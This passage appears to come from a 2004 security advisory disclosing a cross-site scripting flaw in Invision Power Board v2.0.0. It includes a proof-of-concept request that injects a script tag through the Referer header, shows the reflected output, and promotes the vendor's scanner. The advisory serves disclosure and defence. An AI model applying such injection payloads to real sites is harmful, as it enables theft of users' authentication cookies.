A remote user can access the target user's cookies (including authentication
cookies).
III. SOLUTION
Not available currently.
IV. VENDOR FIX/RESPONSE
n/a
V. CREDIT
This vulnerability was discovered by Positive Technologies using MaxPatrol
(www.maxpatrol.com) - intellectual professional security scanner. It is able
to detect a substantial amount of vulnerabilities not published yet.
MaxPatrol's intelligent algorithms are also capable to detect a lot of
vulnerabilities in custom web-scripts (XSS, SQL and code injections, HTTP
Response splitting).
Date: 5.10.2004
Severity: Low
Application: Invision Power Board v2.0.0
Platform: PHP
I. DESCRIPTION
An input validation vulnerability was found in Invision Power Board. A
remote user can conduct Cross site scripting attack.
1.
GET /index.php?s=5875d919a790a7c429c955e4d65b5d54&act=Login&CODE=00 HTTP/1.0
Referer: "'/><script>alert()</script>
Result
<...>
index.php?s=7ff7c2ec2bc7f6e349b326dcee4cf41c&act=Login&CODE=01"
method="post" name="LOGIN" onsubmit="return ValidateForm()">
<input type="hidden" name="referer" value="\"\'/><script>alert()</script>"
/>
<...>
II. IMPACT
A remote user can access the target user's cookies (including authentication
cookies).
III. SOLUTION
Not available currently.
IV. VENDOR FIX/RESPONSE
n/a
V. CREDIT
This vulnerability was discovered by Positive Technologies using MaxPatrol
(www.maxpatrol.com) - intellectual professional security scanner. It is able
to detect a substantial amount of vulnerabilities not published yet.
MaxPatrol's intelligent algorithms are also capable to detect a lot of
vulnerabilities in custom web-scripts (XSS, SQL and code injections, HTTP
Response splitting).
[ reply ]